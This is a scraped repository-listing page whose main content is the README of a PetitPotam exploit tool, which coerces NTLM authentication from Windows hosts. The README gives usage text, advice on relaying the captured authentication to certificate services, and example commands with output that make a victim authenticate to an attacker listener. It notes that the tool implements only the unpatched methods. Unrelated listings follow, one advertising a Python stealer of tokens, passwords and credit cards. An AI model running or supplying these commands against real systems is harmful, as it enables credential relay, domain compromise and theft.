Python implementation for PetitPotam

Related tags

Third-party APIs WrappersPetitPotam
Overview

PetitPotam

Coerce NTLM authentication from Windows hosts

Installtion

$ pip3 install impacket

Usage

usage: petitpotam.py [-h] [-debug] [-port [destination port]] [-pipe pipe]
                     [-method method] [-target-ip ip address]
                     [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
                     target path

PetitPotam - Coerce authentication from Windows hosts

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
  path                  UNC path for authentication

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON

connection:
  -port [destination port]
                        Destination port to connect to MS-RPRN named pipe
  -pipe pipe            Named pipe to use (default: lsarpc)
  -method method        Method used for coercing authentication
  -target-ip ip address
                        IP Address of the target machine. If ommited it will use
                        whatever was specified as target. This is useful when
                        target is the NetBIOS name and you cannot resolve it

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters. If
                        valid credentials cannot be found, it will use the ones
                        specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will
                        use the domain part (FQDN) specified in the target
                        parameter

Examples

In these examples, the victim is 172.16.19.100 and the attacker is 172.16.19.1

The attack can use impacket-ntlmrelayx to relay the authentication to interesting endpoints, for instance Active Directory Certificate Services Web Enrollment.

By default, a random method will be chosen.

The target may or may not require authentication. These examples were tested on a Windows 2022 server, and no authentication was required.

The UNC path must point to the attacker's listener. Note that if the attacker is not part of the trusted intranet zone, the Windows host will try to authenticate with a null session. This can be circumvented by either using a NETBIOS name or ADIDNS record for the attacker.

Random Method

$ python3 petitpotam.py -debug '172.16.19.100' '\\172.16.19.1\share\foo'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[+] Connecting to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Connected to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Binding to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[+] Bound to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[*] Choosing random method
[*] Using method: AddUsersToFile
[*] Coercing authentication to: '\\\\172.16.19.1\\share\\foo'
[*] Success!

Specific Method

$ python3 petitpotam.py -debug -method AddUsersToFile '172.16.19.100' '\\172.16.19.1\share\foo'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[+] Connecting to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Connected to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Binding to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[+] Bound to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[*] Using method: AddUsersToFile
[*] Coercing authentication to: '\\\\172.16.19.1\\share\\foo'
[*] Success!

Details

PetitPotam was orignally created / discovered by topotam. This exploit is heavily based on the implementation and research from topotam.

If you're using ntlmrelayx and the Windows host connects with an anonymous logon (null) session, please see this pull request to fix the issue. You can confirm the authentication coercion with Responder.

CVE-2021-36942

Microsoft has released a patch for PetitPotam, but only for two of the methods (EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv). For that reason, those methods are not implemented in this exploit.

Instead, the other methods (which were not fully implemented by topotam) have been implemented in this exploit.

Authors

Credits

Owner
Oliver Lyak
Security Researcher
Previously known as @ollypwn
Oliver Lyak
GitHub Repository
An Simple Advance Auto Filter Bot Complete Rewritten Version Of Adv-Filter-Bot

Adv Auto Filter Bot V2 This Is Just An Simple Advance Auto Filter Bot Complete Rewritten Version Of Adv-Filter-Bot.. Just Sent Any Text As Query It Wi

0 Dec 18, 2021
Bot that embeds a random hysterical meme from Reddit into your text channel as an embedded message, using an API call.

Discord_Meme_Bot 🤣 Bot that embeds a random hysterical meme from Reddit into your text channel as an embedded message, using an API call. Add the bot

2 Jan 16, 2022
Coinbase Pro API interface framework and tooling

neutrino This project has just begun. Rudimentary API documentation Installation Prerequisites: Python 3.8+ and Git 2.33+ Navigate into a directory of

Joshua Chen 1 Dec 26, 2021
OKEX数字货币自动交易python语言SDK

okex-py OKEx数字货币自动交易python语言SDK (非官方) OKEx Cryptocurrency Exchange python SDK (Unofficial) 本项目基于V5 API 使用例子 Example import okex.v5.account_api as acco

43 Dec 01, 2022
Discord Token Checker and Info

Discord Token Checker A simple way to check Discord user tokens and their info in bulk. By Roover#7098. https://discord.gg/W8hnMWY6XP Proxy support co

Roover 3 Dec 09, 2021
Algofi Python SDK is useful for developers who want to programatically interact with the Algofi lending protocol

algofi-py-sdk Algofi Python SDK Documentation https://algofi-py-sdk.readthedocs.

Algofi 41 Dec 15, 2022
A Bot, which observes your counting-abilities and controls your drinking-habits, too!

Discord Counting Bot with Beer-Counter Heavily inspired by AlexVerricos Counting_bot, but adjusted a lot for the beer drinking habits of students. Inv

Jakob Jung 3 Oct 18, 2022
AWS Lambda - Parsing Cloudwatch Data and sending the response via email.

AWS Lambda - Parsing Cloudwatch Data and sending the response via email. Author: Evan Erickson Language: Python Backend: AWS / Serverless / AWS Lambda

Evan Scott Erickson 1 Nov 14, 2021
A virus/stealer made in py

python-virus A virus/stealer made in py. Features: Discord token stealer, Password stealer, Windows key stealer, Credit-card stealer, Image grab, Anti

SKYNETMARCI 5 Dec 12, 2022
“Hey there 👋 I'm szrosebot .A Powerful, Smart And Simple Group Manager with some extra features..

A Powerful, Smart And Simple Group Manager szrose bot This is the clone of DewmiBotit is a Powerful, Smart And Simple Group Manager bot made by hiruna

slgeekshow 36 Oct 30, 2022
Python library for the DeepL language translation API.

The DeepL API is a language translation API that allows other computer programs to send texts and documents to DeepL's servers and receive high-quality translations. This opens a whole universe of op

DeepL 535 Jan 04, 2023
A Python script to create customised Spotify playlists using the JSON, Spotipy Library and Spotify Web API, based on seed tracks in your history.

A Python script to create customised Spotify playlists using the JSON, Spotipy Library and Spotify Web API, based on seed tracks in your history.

Youngseo Park 1 Feb 01, 2022
Charged's cogs for Red!

Light-Cogs Charged's cogs for Red! Read below for more information. Features and Cogs TechInfo Lots of commands helping you and your devices! Extended

Charged 2 Jan 07, 2022
A Twitter Bot that retweets and likes tweets with the hashtag #girlscriptwoc and #girlscript, and also follows the user.

GirlScript Winter of Contributing Twitter Bot A Twitter Bot that retweets and likes tweets with the hashtag #girlscriptwoc and #girlscript, and also f

Pranay Gupta 9 Dec 15, 2022
Nft-maker - Create your own NFT!

nft-maker How to If you're going to use this program, change the pictures in the "images" folder. All images must be of the same resolution and size.

Georgii Arakelian 4 Mar 13, 2022
Telegram Voice Chat UserBot made with Pyrogram and MarshalX/tgcalls with playlist and Heroku support

Telegram Voice Chat UserBot A Telegram UserBot to Play Audio in Voice Chats. This is also the source code of the userbot which is being used for playi

Calls Music 164 Nov 12, 2022
KalmanFilterExercise - A Kalman Filter is a algorithmic filter that is used to estimate the state of an unknown variable

Kalman Filter Exercise What are Kalman Filters? A Kalman Filter is a algorithmic

4 Feb 26, 2022
Texting service to receive current air quality conditions and maps, powered by AirNow, Twilio, and AWS

The Air Quality Bot is generally available by texting a zip code (and optionally the word "map") to (415) 212-4229. The bot will respond with the late

Alex Laird 8 Oct 16, 2022
Properly-formatted dynamic timestamps for Discord messages

discord-timestamps discord-timestamps generates properly-formatted dynamic timestamps for Discord messages, with support for Arrow objects. format

Ben Soyka 2 Mar 10, 2022
Who are we? We are the Hunters of all Torrent in this world.🗡️.Fork from SlamDevs

MIRROR HUNTER This Mirror Bot is a multipurpose Telegram Bot writen in Python for mirroring files on the Internet to our beloved Google Drive. Repo la

Anime Republic 130 May 28, 2022